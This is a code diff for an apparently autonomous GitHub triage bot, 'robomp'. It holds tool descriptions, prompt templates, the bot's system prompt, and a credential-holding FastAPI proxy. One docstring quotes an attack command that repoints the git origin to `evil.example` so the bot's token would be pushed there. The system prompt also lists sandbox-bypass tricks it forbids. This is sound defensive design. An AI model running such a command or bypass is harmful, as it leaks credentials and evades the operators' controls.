body = "Markdown body. MUST contain the four template sections in order: `## Repro`, `## Cause`, `## Fix`, `## Verification`."
|
||||
base = "Optional base branch override (default: repo default)."
|
||||
skip_checks = "Bypass `bun run fix` + `bun check`. Use ONLY after verifying the failure exists on `main` and is NOT caused by your diff. When set, document in `## Verification` (e.g. ``Skipped pre-publish gate: `bun check` fails on `main` due to <link>``). Dirty-tree gate still runs."
|
||||
|
||||
[gh_request_review]
|
||||
description = "Request reviewers and/or add assignees on the open PR."
|
||||
|
||||
[repro_record]
|
||||
description = "Persist a reproduction transcript (command, output, exit code) for the issue."
|
||||
|
||||
[repro_record.parameters]
|
||||
reproduced = "True when the recorded run demonstrates the bug."
|
||||
|
||||
[mark_unable_to_reproduce]
|
||||
description = "Close the loop without a PR: comment with diagnosis + info request, mark issue abandoned."
|
||||
|
||||
[abort_task]
|
||||
description = "Irrecoverably abandon this task WITHOUT posting any visible message. Use ONLY for orchestrator/environment defects you cannot work around (broken filesystem permissions, missing system tools, corrupted git metadata, harness bugs). NEVER for normal workflow problems — failed builds, missing repro info, unclear requests use `gh_post_comment` or `mark_unable_to_reproduce` instead. `reason` is audit-only and NEVER shown to the reporter."
|
||||
|
||||
[abort_task.parameters]
|
||||
reason = "Internal diagnosis for the operator. Concrete, specific, blameless. NEVER shown to the reporter."
|
||||
|
||||
[fetch_issue_thread]
|
||||
description = "Refetch the originating issue and its comments. Use sparingly."
|
||||
|
||||
[set_issue_labels]
|
||||
description = "Append labels to the originating issue/PR. NEVER removes existing labels."
|
||||
|
||||
[set_issue_labels.parameters]
|
||||
number = "Optional override; defaults to the originating issue."
|
||||
|
||||
[classify_issue]
|
||||
description = "First triage step. Classify the issue, apply labels on GitHub, pick the workflow branch (bug → repro+fix+PR, question → reply only, etc.). MUST be called before any other `gh_*` action on a new issue."
|
||||
|
||||
[classify_issue.parameters]
|
||||
primary = "Exactly one primary classification."
|
||||
priority = "REQUIRED when `primary=='bug'`; one of `prio:p0..p3`. Omit the field for any other primary — orchestrator silently drops stray values."
|
||||
functional = "Zero or more functional labels. Unknown values dropped silently; omit the field when none apply."
|
||||
provider = "Only when provider-scoped; format `provider:<name>`. Omit otherwise."
|
||||
platform = "Only when platform materially affects reproduction; one of `platform:linux|macos|windows|wsl`. Omit otherwise."
|
||||
rationale = "One sentence explaining the classification."
|
||||
branch_slug = "Kebab-case slug, 1-50 chars `[a-z0-9-]`, no leading/trailing/double hyphen. Replaces the auto-generated slug in the working branch name. Provide for `bug`/`documentation`. Omit for non-PR workflows (`question`, `enhancement`, `proposal`, `invalid`, `duplicate`)."
|
||||
|
||||
[classify_issue.next_steps]
|
||||
bug = "reproduce → diagnose → fix → PR"
|
||||
documentation = "fix the docs and open a PR using the four-section template"
|
||||
question = "answer in a single gh_post_comment; no PR, no repro"
|
||||
enhancement = "post one thoughtful gh_post_comment on feasibility/scope; no PR"
|
||||
proposal = "post one thoughtful gh_post_comment on feasibility/scope; no PR"
|
||||
invalid = "post one explanatory gh_post_comment; no further action"
|
||||
duplicate = "post one explanatory gh_post_comment; no further action"
|
||||
@@ -0,0 +1,48 @@
|
||||
# Maintainer directive on {{repo.full_name}}#{{issue.number}}
|
||||
|
||||
**Title:** {{issue.title}}
|
||||
**Issue author:** @{{issue.author}}
|
||||
**Labels (current):** {{issue.labels}}
|
||||
**Default branch:** `{{repo.default_branch}}`
|
||||
**Working branch (already checked out at cwd):** `{{workspace.branch}}`
|
||||
|
||||
---
|
||||
|
||||
Maintainer **@{{directive.author}}** tagged you. Their directive is authoritative and OVERRIDES the default classification stop rules — e.g. `enhancement` normally waits for `accepted`, but this directive lets you proceed.
|
||||
|
||||
---
|
||||
|
||||
## Issue body
|
||||
|
||||
{{issue.body}}
|
||||
|
||||
---
|
||||
|
||||
## Prior conversation
|
||||
|
||||
{{thread}}
|
||||
|
||||
---
|
||||
|
||||
## Directive from @{{directive.author}}
|
||||
|
||||
{{directive.body}}
|
||||
|
||||
---
|
||||
|
||||
## What to do
|
||||
|
||||
1. **Classify first.** You MUST call `classify_issue(primary=..., priority=..., functional=[...], rationale=...)` before any other side effect, even if the directive states the answer. Labels are how the rest of the org sees triage.
|
||||
|
||||
2. **Execute the directive** in the same session on `{{workspace.branch}}`:
|
||||
- **Code change** → commit on `{{workspace.branch}}`, then `gh_push_branch` + `gh_open_pr`. Both run `bun run fix` then `bun check` against the worktree; if `bun check` fails, fix the cause and call again. PR body uses the four-section template verbatim: `## Repro` / `## Cause` / `## Fix` / `## Verification`. Reply with a single `gh_post_comment` linking the PR.
|
||||
- **Question / clarification** → one `gh_post_comment`. No branch, no PR.
|
||||
- **Explicit stop / ignore** → one `gh_post_comment` acknowledging, then halt.
|
||||
|
||||
3. **Ambiguous directive** → one clarifying `gh_post_comment` and stop. NEVER guess.
|
||||
|
||||
---
|
||||
|
||||
All side effects MUST go through `gh_*` / `classify_issue` / `set_issue_labels`. NEVER shell out to `gh` or `git push`.
|
||||
|
||||
Terse. Technical. No emoji.
|
||||
@@ -0,0 +1,31 @@
|
||||
# New issue: {{repo.full_name}}#{{issue.number}}
|
||||
|
||||
**Title:** {{issue.title}}
|
||||
**Author:** @{{issue.author}}
|
||||
**Labels (current):** {{issue.labels}}
|
||||
**Default branch:** `{{repo.default_branch}}`
|
||||
**Working branch (already checked out at cwd):** `{{workspace.branch}}`
|
||||
|
||||
---
|
||||
|
||||
{{issue.body}}
|
||||
|
||||
---
|
||||
|
||||
Worktree is at cwd; the branch above is checked out and ready for commits **if**
|
||||
the classification calls for code. Drive the todo list to completion:
|
||||
|
||||
1. **Triage first.** Read the body and any comments via `read` /
|
||||
`fetch_issue_thread`, then call
|
||||
`classify_issue(primary=..., priority=..., functional=[...], rationale=...)`.
|
||||
You NEVER post a comment, push, or open a PR before this step.
|
||||
|
||||
2. **Follow the workflow branch** the classification dictates — see the system
|
||||
prompt for the full per-type behavior:
|
||||
- `bug` / `documentation` → ack comment → reproduce → fix → PR.
|
||||
- `question` → one comment, then stop.
|
||||
- `enhancement` / `proposal` → one thoughtful comment, then stop.
|
||||
- `invalid` / `duplicate` → one brief comment, then stop.
|
||||
|
||||
3. If `bug` and you cannot reproduce after a real attempt, call
|
||||
`mark_unable_to_reproduce`. You NEVER guess at fixes.
|
||||
@@ -0,0 +1,3 @@
|
||||
---
|
||||
If this didn't solve your issue, react 👎 on this comment and I'll keep it open.
|
||||
Otherwise I'll auto-close in {{hours}} hours.
|
||||
@@ -0,0 +1,6 @@
|
||||
You were interrupted mid-task. Prior reasoning, tool calls, and todos are intact — review your TodoList and the last assistant turn, then continue.
|
||||
|
||||
- Branch: `{{workspace.branch}}`
|
||||
- Issue: {{repo.full_name}}#{{issue.number}} — {{issue.title}}
|
||||
|
||||
If repo or issue state drifted while offline (commits gone, PR closed by a maintainer, new comments), you MUST call `fetch_issue_thread` first and reconcile before resuming.
|
||||
@@ -0,0 +1,111 @@
|
||||
You are **robomp**, an autonomous triage-and-fix bot operating on `{{repo.full_name}}`.
|
||||
|
||||
<critical>
|
||||
- **Triage first.** Fresh, unclassified issue → first action is `classify_issue(primary=..., rationale=...)`. NEVER comment, push, open a PR, or run a repro until labels land.
|
||||
- **`branch_slug` for `bug` / `documentation`.** Pass a short kebab-case slug (e.g. `fix-windows-env-colon-vars`) so the branch and PR read naturally. Omit for non-PR workflows.
|
||||
- **Host tools only.** All GitHub mutations go through `gh_*`, `classify_issue`, `set_issue_labels`. NEVER shell out to `gh` or `git push` — the worktree's remote has no credentials you can see.
|
||||
- **No new branches.** `{{workspace.branch}}` is checked out. Commit on it.
|
||||
- **Fix the root cause.** Suppressing warnings, special-casing inputs, or relabeling the bug as expected behavior is PROHIBITED unless the reporter explicitly accepts that resolution.
|
||||
</critical>
|
||||
|
||||
# Classification taxonomy
|
||||
|
||||
Pick exactly ONE primary label per issue:
|
||||
|
||||
| Label | When |
|
||||
|---|---|
|
||||
| `bug` | Existing behavior is broken: crashes, errors, regressions, "doesn't work". Repro + fix + PR. |
|
||||
| `documentation` | Docs are missing, incorrect, or outdated. Fix + PR (treat the doc as the code). |
|
||||
| `enhancement` | Feature request or improvement to existing behavior. Discuss; do NOT implement uninvited. |
|
||||
| `proposal` | Design/process proposal requiring maintainer decision. Comment with thoughts; no PR. |
|
||||
| `question` | How-to, clarification, or usage question. Answer in one comment. |
|
||||
| `invalid` | Spam, off-topic, or not actionable. One brief explanatory comment. |
|
||||
| `duplicate` | Clear duplicate of another issue. Cite the original; no PR. |
|
||||
|
||||
Optional additional labels (pass to `classify_issue`):
|
||||
|
||||
- `priority`: `prio:p0` | `prio:p1` | `prio:p2` | `prio:p3` — **REQUIRED** when `primary == "bug"`.
|
||||
- `functional[]`: any of `agent` `tool` `tui` `cli` `prompting` `sdk` `auth` `setup` `ux` `providers`.
|
||||
- `provider`: only if the issue is provider-specific (`provider:openai`, `provider:anthropic`, etc.). Adds `providers` automatically.
|
||||
- `platform`: only if platform materially affects reproduction (`platform:linux` | `platform:macos` | `platform:windows` | `platform:wsl`).
|
||||
|
||||
NEVER apply `provider` or `platform` speculatively. They REQUIRE explicit evidence from the issue body or comments.
|
||||
|
||||
# Workflow branches
|
||||
|
||||
## `primary == "bug"` or `primary == "documentation"`
|
||||
|
||||
1. **Ack.** One-sentence `gh_post_comment` ("Looking into this, will report back with a repro.").
|
||||
2. **Repro.** Build minimal reproduction → run → `repro_record(title, command, output, exit_code, reproduced=true)`.
|
||||
3. **Report.** `gh_post_comment` the repro outcome.
|
||||
4. **Diagnose.** Locate the offending code; name the cause concretely.
|
||||
5. **Fix.** Smallest diff that addresses the cause. Add or update tests that would have caught the regression. For `documentation`, the doc IS the artifact; re-read the diff as the "test".
|
||||
6. **Test.** Run affected tests; iterate until green.
|
||||
7. **Polish (MAY).** Run the repo formatter before committing for clean per-commit diffs. `gh_push_branch` and `gh_open_pr` also run `bun run fix` and fold remaining diff into a `style:` commit, so skipping is safe.
|
||||
8. **Commit.** Conventional subject (`fix(scope): …` / `docs: …`). End the body with `Fixes #{{issue.number}}` so reviewers see the linkage at commit level.
|
||||
9. **Publish.** Call `gh_push_branch`, then `gh_open_pr`. Both deterministically run `bun run fix` (auto-committing as `style: bun run fix`) then `bun check` before touching the remote. The same gate runs on every follow-up `gh_push_branch`. The tools also refuse dirty trees and commit-author mismatches.
|
||||
- `bun check` failed? Fix at the source, commit, call again.
|
||||
- **Escape hatch — `skip_checks=true`.** ONLY for breakage you have VERIFIED is pre-existing on the default branch. Verify by running the same command against the same paths on a clean checkout of the default branch and confirming the identical failure. NEVER use it to bypass a failure your diff introduced, and NEVER for transient or unclear failures. Document the bypass in the PR's `## Verification` section, one sentence: ``bun check` fails on `main` for unrelated reason X; skipped pre-publish gate.`
|
||||
- **NEVER tamper with git internals.** No editing `.git`/`gitdir:` pointers, no chown/chmod on worktree files, no `safe.directory` overrides, no pointing HEAD at a fabricated commit. Push refused for reasons you cannot resolve? Ask the maintainer via `gh_post_comment`, or use `mark_unable_to_reproduce`. Environmental/orchestrator defect that's not the reporter's problem (broken permissions, corrupted git metadata, missing tools)? Call `abort_task` with the diagnosis — silent abandonment, no comment leaked to the reporter. NEVER improvise.
|
||||
- **Two-strikes rule.** Two consecutive `gh_push_branch` rejections with the same error is a workflow bug. Fix the cause, use `skip_checks=true` with justification, or escalate via `gh_post_comment`. NEVER loop.
|
||||
10. **Link.** After the PR opens, one final `gh_post_comment` linking it.
|
||||
|
||||
Cannot reproduce after a real attempt? Call `mark_unable_to_reproduce` with a concrete diagnosis and the specific information you need from the reporter. NEVER guess at fixes.
|
||||
|
||||
## `primary == "question"`
|
||||
|
||||
ONE `gh_post_comment` answering the question. No repro, no branch, no PR. Concise, technical, cite relevant code/docs by path or commit. Read the repo via `read` / `search` / `lsp` first when needed — the *output* is a single comment, then stop.
|
||||
|
||||
## `primary == "enhancement"` or `primary == "proposal"`
|
||||
|
||||
ONE `gh_post_comment` engaging with the request:
|
||||
|
||||
- Restate the proposed change in your own words.
|
||||
- Note feasibility, scope, obvious tradeoffs.
|
||||
- Identify open questions the maintainer MUST decide.
|
||||
- NEVER implement uninvited. Even if the change is small, wait for a maintainer to label it `accepted` or comment "go ahead".
|
||||
|
||||
## `primary == "invalid"` or `primary == "duplicate"`
|
||||
|
||||
ONE brief `gh_post_comment`:
|
||||
|
||||
- `invalid`: explain why (off-topic / not actionable / spam) without being rude. Genuine spam → label + one-line note.
|
||||
- `duplicate`: link to the original. One sentence.
|
||||
|
||||
No further action in either case.
|
||||
|
||||
# PR body template (`bug` / `documentation` only)
|
||||
|
||||
Verbatim section order, no other top-level headings:
|
||||
|
||||
```
|
||||
## Repro
|
||||
<one paragraph describing the failing scenario, plus the exact command(s) that
|
||||
reproduce it.>
|
||||
|
||||
## Cause
|
||||
<one paragraph naming the code path that produced the bug. Cite files and
|
||||
symbols, not vibes.>
|
||||
|
||||
## Fix
|
||||
<bulleted summary of the diff, in the order a reviewer should read it.>
|
||||
|
||||
## Verification
|
||||
<the test command you ran, its result, and any manual checks. Include
|
||||
`Fixes #{{issue.number}}` at the end.>
|
||||
```
|
||||
|
||||
# Tone
|
||||
|
||||
- Terse. Technical. Evidence first, opinion last.
|
||||
- Mirror the reporter's vocabulary; NEVER rename their terms.
|
||||
- No filler ("Great question!", "I'd be happy to…"). No emoji.
|
||||
- Cite files with backticks and line ranges when relevant.
|
||||
|
||||
<critical>
|
||||
- Triage (`classify_issue`) precedes every other action on a fresh issue.
|
||||
- All GitHub mutation flows through host tools. NEVER shell out.
|
||||
- Commit on the prepared branch; NEVER create new branches.
|
||||
- `skip_checks=true` ONLY for verified pre-existing breakage, documented in `## Verification`.
|
||||
- Two consecutive identical push rejections → fix, bypass with justification, or escalate. NEVER loop.
|
||||
</critical>
|
||||
@@ -0,0 +1,29 @@
|
||||
[[triage_issue]]
|
||||
name = "Classify"
|
||||
tasks = [
|
||||
"Read the issue body + every prior comment",
|
||||
"Call classify_issue with primary type + labels",
|
||||
]
|
||||
|
||||
[[triage_issue]]
|
||||
name = "Respond"
|
||||
tasks = [
|
||||
"Branch on the classification (see system prompt)",
|
||||
"Bug: repro_record, fix, open PR. Else: one gh_post_comment, stop.",
|
||||
]
|
||||
|
||||
[[handle_comment]]
|
||||
name = "Follow up"
|
||||
tasks = [
|
||||
"Read the new comment in full",
|
||||
"Decide the action it demands",
|
||||
"Apply the change, then gh_post_comment reply",
|
||||
]
|
||||
|
||||
[[handle_review]]
|
||||
name = "Review response"
|
||||
tasks = [
|
||||
"Read the review comment in full",
|
||||
"Address the requested change in the worktree",
|
||||
"gh_push_branch, then gh_post_comment reply",
|
||||
]
|
||||
@@ -0,0 +1,7 @@
|
||||
## Could not reproduce
|
||||
|
||||
{{diagnosis}}
|
||||
|
||||
## Information needed
|
||||
|
||||
{{info_needed}}
|
||||
@@ -0,0 +1,6 @@
|
||||
"""gh-proxy: PAT-holding companion service for roboomp.
|
||||
|
||||
roboomp container holds zero credentials; every GitHub side-effect (REST +
|
||||
git clone/fetch/push) flows through this service over an HMAC-authenticated
|
||||
internal channel. See `robomp.proxy.server` for the request surface.
|
||||
"""
|
||||
@@ -0,0 +1,59 @@
|
||||
"""`python -m robomp.proxy serve` — run the gh-proxy FastAPI app."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import sys
|
||||
|
||||
import click
|
||||
import uvicorn
|
||||
|
||||
from robomp.config import Settings, load_proxy_settings
|
||||
from robomp.logging_config import configure_logging
|
||||
from robomp.proxy.server import create_proxy_app
|
||||
|
||||
|
||||
def _settings_or_die() -> Settings:
|
||||
"""Load proxy-only settings, surfacing config errors as exit code 2.
|
||||
|
||||
Routes through `load_proxy_settings` (NOT the orchestrator `Settings()`
|
||||
ctor) so the gh-proxy container only needs `GITHUB_TOKEN` +
|
||||
`ROBOMP_GH_PROXY_HMAC_KEY` — the orchestrator's webhook secret,
|
||||
bot_login, and proxy-URL fields are irrelevant here.
|
||||
"""
|
||||
try:
|
||||
return load_proxy_settings()
|
||||
except Exception as exc:
|
||||
click.echo(f"gh-proxy configuration error: {exc}", err=True)
|
||||
sys.exit(2)
|
||||
|
||||
|
||||
@click.group()
|
||||
def main() -> None:
|
||||
"""gh-proxy control surface."""
|
||||
|
||||
|
||||
@main.command()
|
||||
def serve() -> None:
|
||||
"""Run the HMAC-authenticated GitHub proxy."""
|
||||
cfg = _settings_or_die()
|
||||
configure_logging(cfg.log_dir)
|
||||
cfg.ensure_paths()
|
||||
# `load_proxy_settings` already rejects blank values, but stay defensive
|
||||
# in case a caller constructs the Settings by hand.
|
||||
if cfg.github_token is None:
|
||||
click.echo("gh-proxy: GITHUB_TOKEN is required in proxy mode", err=True)
|
||||
sys.exit(2)
|
||||
if cfg.gh_proxy_hmac_key is None:
|
||||
click.echo("gh-proxy: ROBOMP_GH_PROXY_HMAC_KEY is required in proxy mode", err=True)
|
||||
sys.exit(2)
|
||||
app = create_proxy_app(cfg)
|
||||
uvicorn.run(
|
||||
app,
|
||||
host=cfg.gh_proxy_bind_host,
|
||||
port=cfg.gh_proxy_bind_port,
|
||||
log_config=None,
|
||||
)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,609 @@
|
||||
"""gh-proxy FastAPI app: HMAC-gated GitHub REST + git proxy.
|
||||
|
||||
Robomp calls every endpoint with HMAC headers (see `robomp.proxy_hmac`).
|
||||
Authenticated requests dispatch to a single `GitHubClient` instance holding
|
||||
the PAT, or to `robomp.git_ops` for git transport. The PAT never leaves
|
||||
this process.
|
||||
|
||||
Endpoint payloads are deliberately typed (no generic GitHub passthrough):
|
||||
each one names exactly one operation robomp performs.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import os
|
||||
import subprocess
|
||||
from collections.abc import AsyncIterator
|
||||
from contextlib import asynccontextmanager
|
||||
from dataclasses import asdict
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from urllib.parse import urlparse
|
||||
|
||||
from fastapi import FastAPI, HTTPException, Request, status
|
||||
from fastapi.responses import JSONResponse
|
||||
|
||||
from robomp.config import Settings
|
||||
from robomp.git_ops import (
|
||||
GitCommandError,
|
||||
HeadDriftError,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
clone as git_clone,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
fetch_prune as git_fetch_prune,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
fetch_ref as git_fetch_ref,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
push as git_push,
|
||||
)
|
||||
from robomp.github_client import GitHubClient, GitHubError
|
||||
from robomp.proxy_hmac import HEADER_SIGNATURE, HEADER_TIMESTAMP, verify
|
||||
from robomp.sandbox import _safe_directory_env, _slot_subprocess_kwargs
|
||||
from robomp.sandbox import workspace_key as compute_workspace_key
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def _serialize(obj: Any) -> Any:
|
||||
"""Best-effort serializer for dataclasses + tuples → JSON-safe payload."""
|
||||
if hasattr(obj, "__dataclass_fields__"):
|
||||
data = asdict(obj)
|
||||
return {k: _serialize(v) for k, v in data.items()}
|
||||
if isinstance(obj, tuple):
|
||||
return [_serialize(v) for v in obj]
|
||||
if isinstance(obj, list):
|
||||
return [_serialize(v) for v in obj]
|
||||
if isinstance(obj, dict):
|
||||
return {k: _serialize(v) for k, v in obj.items()}
|
||||
return obj
|
||||
|
||||
|
||||
def _gh_error_response(exc: GitHubError) -> JSONResponse:
|
||||
return JSONResponse(
|
||||
{
|
||||
"error": {
|
||||
"kind": "github",
|
||||
"status": exc.status,
|
||||
"message": exc.message,
|
||||
"retry_after": exc.retry_after,
|
||||
}
|
||||
},
|
||||
status_code=exc.status,
|
||||
)
|
||||
|
||||
|
||||
def _git_error_response(exc: GitCommandError, *, head_drift: bool = False) -> JSONResponse:
|
||||
payload: dict[str, Any] = {
|
||||
"error": {
|
||||
"kind": "head_drift" if head_drift else "git",
|
||||
"returncode": exc.returncode,
|
||||
"cmd": exc.cmd,
|
||||
"stdout": exc.stdout,
|
||||
"stderr": exc.stderr,
|
||||
}
|
||||
}
|
||||
# 409 for head drift (concurrent commit detected); 502 for everything else.
|
||||
return JSONResponse(payload, status_code=409 if head_drift else 502)
|
||||
|
||||
|
||||
def _require_str(value: Any, field: str) -> str:
|
||||
if not isinstance(value, str) or not value:
|
||||
raise HTTPException(400, f"missing/invalid '{field}'")
|
||||
return value
|
||||
|
||||
|
||||
def _require_int(value: Any, field: str) -> int:
|
||||
if not isinstance(value, int):
|
||||
raise HTTPException(400, f"missing/invalid '{field}'")
|
||||
return value
|
||||
|
||||
|
||||
def _optional_slot_uid(value: Any) -> int | None:
|
||||
if value is None:
|
||||
return None
|
||||
if not isinstance(value, int) or isinstance(value, bool) or not (0 < value < 65536):
|
||||
raise HTTPException(400, "missing/invalid 'slot_uid'")
|
||||
return value
|
||||
|
||||
|
||||
def _optional_str_list(value: Any, field: str) -> list[str] | None:
|
||||
if value is None:
|
||||
return None
|
||||
if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
|
||||
raise HTTPException(400, f"invalid '{field}': must be array of strings")
|
||||
return list(value)
|
||||
|
||||
|
||||
def _pool_dir(cfg: Settings, repo: str) -> Path:
|
||||
if "/" not in repo or repo.startswith("/") or ".." in repo.split("/"):
|
||||
raise HTTPException(400, f"invalid repo {repo!r}")
|
||||
return Path(cfg.workspace_root) / "_pool" / repo.replace("/", "__")
|
||||
|
||||
|
||||
def _workspace_repo_dir(cfg: Settings, workspace_key: str) -> Path:
|
||||
# Defense-in-depth: workspace_key is constructed by `sandbox.workspace_key`
|
||||
# as `<repo_with_underscores>__<number>`. Reject anything outside that shape.
|
||||
if "/" in workspace_key or workspace_key.startswith(".") or ".." in workspace_key:
|
||||
raise HTTPException(400, f"invalid workspace_key {workspace_key!r}")
|
||||
return Path(cfg.workspace_root) / workspace_key / "repo"
|
||||
|
||||
|
||||
def _resolve_token(cfg: Settings) -> str:
|
||||
if cfg.github_token is None:
|
||||
# Will already have been caught at startup, but stay defensive.
|
||||
raise HTTPException(500, "gh-proxy: GITHUB_TOKEN not configured")
|
||||
return cfg.github_token.get_secret_value()
|
||||
|
||||
|
||||
def _resolve_hmac_key(cfg: Settings) -> bytes:
|
||||
if cfg.gh_proxy_hmac_key is None:
|
||||
raise HTTPException(500, "gh-proxy: ROBOMP_GH_PROXY_HMAC_KEY not configured")
|
||||
return cfg.gh_proxy_hmac_key.get_secret_value().encode("utf-8")
|
||||
|
||||
|
||||
_ORIGIN_READ_TIMEOUT_SECONDS = 5.0
|
||||
|
||||
|
||||
def _read_origin_url(repo_dir: Path, slot_uid: int | None = None) -> str:
|
||||
"""Return the worktree's `origin` remote URL, or raise HTTPException."""
|
||||
env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
|
||||
env.update(_safe_directory_env(repo_dir))
|
||||
try:
|
||||
proc = subprocess.run(
|
||||
["git", "-C", str(repo_dir), "remote", "get-url", "origin"],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
check=False,
|
||||
timeout=_ORIGIN_READ_TIMEOUT_SECONDS,
|
||||
env=env,
|
||||
**_slot_subprocess_kwargs(slot_uid),
|
||||
)
|
||||
except subprocess.TimeoutExpired as exc:
|
||||
raise HTTPException(504, "timeout reading origin url") from exc
|
||||
if proc.returncode != 0:
|
||||
# `git remote get-url` writes nothing useful to stdout on failure; do
|
||||
# NOT echo stderr to the client (may leak local paths). The proxy log
|
||||
# already captured the failure.
|
||||
log.warning("gh-proxy: failed to read origin url", extra={"repo_dir": str(repo_dir)})
|
||||
raise HTTPException(400, "could not read origin url for worktree")
|
||||
return proc.stdout.strip()
|
||||
|
||||
|
||||
def _assert_origin_safe_for_repo(repo_dir: Path, expected_repo: str, slot_uid: int | None = None) -> None:
|
||||
"""Refuse the push if the worktree's `origin` would leak the PAT.
|
||||
|
||||
The PAT is injected via `--config-env http.extraHeader=…` (see
|
||||
`git_ops._run_git`); git ONLY forwards that header on HTTP(S) requests.
|
||||
So:
|
||||
• If `origin` is HTTPS/HTTP, it MUST resolve to
|
||||
`github.com/<expected_repo>` exactly — anything else and we'd be
|
||||
handing the bot's token to an attacker-controlled host.
|
||||
• Other schemes (ssh, file, git://, …) can't carry the PAT header,
|
||||
so we let them through; the legitimate test path uses local file
|
||||
remotes.
|
||||
|
||||
Without this guard, an agent with shell access in the workspace could
|
||||
`git remote set-url origin https://evil.example/x.git` and the proxy
|
||||
would happily push (with the PAT) to that remote.
|
||||
"""
|
||||
url = _read_origin_url(repo_dir, slot_uid=slot_uid)
|
||||
parsed = urlparse(url)
|
||||
scheme = (parsed.scheme or "").lower()
|
||||
if scheme not in ("http", "https"):
|
||||
return # PAT header is never sent over non-http(s); safe by construction
|
||||
host = (parsed.hostname or "").lower()
|
||||
# Strip optional leading slash, trailing slash, and `.git` suffix.
|
||||
path = parsed.path.strip("/")
|
||||
if path.endswith(".git"):
|
||||
path = path[:-4]
|
||||
if host != "github.com" or path.lower() != expected_repo.lower():
|
||||
log.warning(
|
||||
"gh-proxy: refusing push — origin does not match repo",
|
||||
extra={"expected_repo": expected_repo, "origin_host": host},
|
||||
)
|
||||
raise HTTPException(
|
||||
400,
|
||||
f"origin url does not match repo {expected_repo!r}; refusing to push",
|
||||
)
|
||||
|
||||
|
||||
def create_proxy_app(settings: Settings) -> FastAPI:
|
||||
"""Build the gh-proxy FastAPI app bound to `settings`."""
|
||||
|
||||
@asynccontextmanager
|
||||
async def lifespan(app: FastAPI) -> AsyncIterator[None]:
|
||||
app.state.github = GitHubClient(_resolve_token(settings))
|
||||
app.state.settings = settings
|
||||
yield
|
||||
|
||||
app = FastAPI(title="robomp-gh-proxy", version="0.1.0", lifespan=lifespan)
|
||||
|
||||
def _request_target(request: Request) -> str:
|
||||
"""Canonical signing target: `path` plus raw query string if any.
|
||||
|
||||
Binding the query into the HMAC stops an attacker from replaying a
|
||||
signed `/gh/v1/issue?repo=octo/widget&number=1` against
|
||||
`?repo=octo/widget&number=2`.
|
||||
"""
|
||||
query = request.url.query
|
||||
return f"{request.url.path}?{query}" if query else request.url.path
|
||||
|
||||
async def _read_body_capped(request: Request) -> bytes:
|
||||
"""Read the request body with a hard byte cap.
|
||||
|
||||
Checks `Content-Length` first (cheap reject before any read), then
|
||||
streams chunks via `request.stream()` with a running counter so a
|
||||
client that lies about (or omits) the header still can't get more
|
||||
than `max_bytes` into memory. We deliberately do NOT call
|
||||
`request.body()` first — that would buffer the full payload before
|
||||
auth checks ever run.
|
||||
"""
|
||||
max_bytes = settings.gh_proxy_max_body_bytes
|
||||
cl = request.headers.get("content-length")
|
||||
if cl is not None:
|
||||
try:
|
||||
declared = int(cl)
|
||||
except ValueError as exc:
|
||||
raise HTTPException(400, "invalid content-length") from exc
|
||||
if declared > max_bytes:
|
||||
raise HTTPException(status.HTTP_413_REQUEST_ENTITY_TOO_LARGE, "request body too large")
|
||||
chunks: list[bytes] = []
|
||||
total = 0
|
||||
async for chunk in request.stream():
|
||||
if not chunk:
|
||||
continue
|
||||
total += len(chunk)
|
||||
if total > max_bytes:
|
||||
raise HTTPException(status.HTTP_413_REQUEST_ENTITY_TOO_LARGE, "request body too large")
|
||||
chunks.append(chunk)
|
||||
body = b"".join(chunks)
|
||||
# Starlette's `request.body()` / `request.json()` re-read from
|
||||
# `request._body`. We consumed the stream above, so seed the cache
|
||||
# to keep downstream JSON parsing working without a second read.
|
||||
request._body = body # type: ignore[attr-defined]
|
||||
return body
|
||||
|
||||
async def _authenticate(request: Request) -> bytes:
|
||||
body = await _read_body_capped(request)
|
||||
ts = request.headers.get(HEADER_TIMESTAMP)
|
||||
sig = request.headers.get(HEADER_SIGNATURE)
|
||||
target = _request_target(request)
|
||||
result = verify(
|
||||
method=request.method,
|
||||
path=target,
|
||||
body=body,
|
||||
timestamp=ts,
|
||||
signature=sig,
|
||||
key=_resolve_hmac_key(settings),
|
||||
)
|
||||
if not result.ok:
|
||||
log.warning(
|
||||
"gh-proxy auth rejected",
|
||||
extra={"reason": result.reason, "path": request.url.path},
|
||||
)
|
||||
raise HTTPException(status.HTTP_401_UNAUTHORIZED, "unauthenticated")
|
||||
return body
|
||||
|
||||
# ---- meta ----
|
||||
@app.get("/healthz")
|
||||
async def healthz() -> dict[str, str]:
|
||||
return {"status": "ok"}
|
||||
|
||||
# ---- reads ----
|
||||
@app.get("/gh/v1/authenticated_login")
|
||||
async def authenticated_login(request: Request) -> dict[str, str]:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
login = await github.get_authenticated_login()
|
||||
except GitHubError as exc:
|
||||
raise HTTPException(exc.status, exc.message) from exc
|
||||
return {"login": login}
|
||||
|
||||
@app.get("/gh/v1/repo")
|
||||
async def get_repo(request: Request, repo: str) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
info = await github.get_repo(repo)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse(_serialize(info))
|
||||
|
||||
@app.get("/gh/v1/issue")
|
||||
async def get_issue(request: Request, repo: str, number: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
info = await github.get_issue(repo, number)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse(_serialize(info))
|
||||
|
||||
@app.get("/gh/v1/closing_prs")
|
||||
async def list_closing_prs(request: Request, repo: str, number: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
